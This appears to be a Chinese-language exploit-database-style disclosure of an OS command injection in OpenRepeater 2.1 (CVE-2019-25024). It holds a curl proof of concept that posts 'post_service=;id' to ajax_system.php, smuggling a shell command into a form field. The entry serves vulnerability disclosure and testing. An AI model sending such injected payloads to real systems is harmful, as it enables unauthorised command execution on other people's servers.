漏洞标题:OpenRepeater 2.1 - 操作系统命令注入
日期:2025-11-25
漏洞作者:CodeSecLab
供应商主页:https://github.com/OpenRepeater/openrepeater
软件链接:https://github.com/OpenRepeater/openrepeater
版本:2.1
测试环境:Ubuntu
CVE:CVE-2019-25024
概念验证
OpenRepeater 2.2之前版本操作系统命令注入漏洞的概念验证代码
易受攻击端点的目标URL
TARGET_URL=“http://openrepeater/functions/ajax_system.php”
用于执行任意命令的有效载荷,例如使用’id’命令来演示该漏洞
PAYLOAD=“post_service=;id”
使用curl发送有效载荷
curl -X POST -d “$PAYLOAD” “$TARGET_URL”
复现步骤:
- 发送POST请求。
- 观察结果,注入的命令(例如,uid=…)将会出现。